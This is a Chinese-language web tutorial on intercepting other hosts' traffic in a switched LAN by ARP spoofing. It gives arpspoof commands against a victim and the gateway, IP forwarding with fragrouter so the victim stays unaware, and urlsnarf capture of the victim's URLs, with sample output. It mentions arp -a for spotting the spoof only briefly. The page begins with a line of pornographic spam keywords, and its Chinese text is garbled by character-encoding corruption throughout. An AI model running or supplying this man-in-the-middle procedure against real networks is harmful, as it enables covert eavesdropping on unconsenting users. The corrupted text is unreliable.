日本免费全黄少妇一区二区三区-高清无码一区二区三区四区-欧美中文字幕日韩在线观看-国产福利诱惑在线网站-国产中文字幕一区在线-亚洲欧美精品日韩一区-久久国产精品国产精品国产-国产精久久久久久一区二区三区-欧美亚洲国产精品久久久久

  1. 首頁 > 云知道 > >

[TIP]交換環(huán)境下的SnifferZT

云知道


通常在局域網(wǎng)環(huán)境中,我們都是通過交換環(huán)境的網(wǎng)關(guān)上網(wǎng)的,在交換環(huán)境中使用NetXray或者NAI Sniffer一類的嗅探工具除了抓到自己的包以外,是不能看到其他主機(jī)的網(wǎng)絡(luò)通信的 。
但是我們可以通過利用ARP欺騙可以實(shí)現(xiàn)Sniffer的目的 。
ARP協(xié)議是將IP解析為MAC地址的協(xié)議,局域網(wǎng)中的通信都是基于MAC的 。
例如下面這樣的情況:
在局域網(wǎng)中192.168.0.24和192.168.0.29都是通過網(wǎng)關(guān)192.168.0.1上網(wǎng)的,假定攻擊者的系統(tǒng)為192.168.0.24,他希望聽到192.168.0.29的通信,那么我們就可以利用ARP欺騙實(shí)現(xiàn) 。
1、 首先告訴192.168.0.29,網(wǎng)關(guān)192.168.0.1的MAC地址是192.168.0.24
2、 告訴192.168.0.1,192.168.0.29的MAC地址是192.168.0.24 。
這樣192.168.0.29和192.168.0.1之間的數(shù)據(jù)包,就會發(fā)給192.168.0.24,也就是攻擊者的機(jī)器,這樣就可以聽到會話了 。但是這么做的有一個問題,192.168.0.29發(fā)現(xiàn)自己不能上網(wǎng)了,因?yàn)樵瓉戆l(fā)給192.168.0.1的數(shù)據(jù)包都被192.168.0.24接收了,而并沒有發(fā)給網(wǎng)關(guān)192.168.0.1 。
這時候192.168.0.24設(shè)置一個包轉(zhuǎn)發(fā)的東西就可以解決這個問題了,也就是從192.168.0.29收到的包轉(zhuǎn)發(fā)給192.168.0.1,在把從192.168.0.1收到的包發(fā)給192.168.0.29 。這樣192.168.0.29根本就不會意識到自己被監(jiān)聽了 。
具體實(shí)現(xiàn):
1、 欺騙192.168.0.29,告訴這臺機(jī)器網(wǎng)關(guān)192.168.0.1的MAC地址是自己(192.168.0.24) 。
[root@Linux dsniff-2.3]# ./arpspoof -i eth0 -t 192.168.0.29 192.168.0.1
0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
0:0:21:0:0:18 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:0:21:0:0:18
………………………………..
這時候?qū)?92.168.0.29的ARP欺騙就開始了 。
2、 欺騙192.168.0.1,告訴網(wǎng)關(guān)192.168.0.29的MAC地址是自己(192.168.0.24) 。
[root@Linux dsniff-2.3]# ./arpspoof -i eth0 -t 192.168.0.1 192.168.0.29
0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71
0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71
0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71
0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e
0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e
0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e
其實(shí)在這個時候192.168.0.29是可以發(fā)現(xiàn)的自己被欺騙了 。在CMD下面使用ARP ?a命令:
C:WINNT>arp -a
Interface: 192.168.0.29 on Interface 0x1000003
Internet Address Physical Address Type
192.168.0.1 00-50-56-40-07-71 dynamic
192.168.0.24 00-50-56-40-07-71 dynamic
兩個IP地址的MAC地址居然是一模一樣的!不過很少有人會這么做:-) 。
3、 設(shè)置一個包轉(zhuǎn)發(fā)
[root@Linux fragrouter-1.6]# ./fragrouter -B1
fragrouter: base-1: normal IP forwarding
在這之前別忘了首先需要打開包轉(zhuǎn)發(fā)的功能
[root@Linux /proc]# echo 1 >/proc/sys/net/ipv4/ip_forward
萬事具備,可以開始SNIFFER了 。
例如想看看192.168.0.29在瀏覽什么地方:
[root@Linux dsniff-2.3]# ./urlsnarf
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]
Kitty[18/May/2002:20:02:25 1100]"GET http://pub72.ezboard.com/flasile155...9.topic&index=7 HTTP/1.1" - - "http://www.Google.com/search?hl=zh-CN&ie=UTF8&oe=UTF8&q=fdfds&BTnG=Google搜索&lr=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

推薦閱讀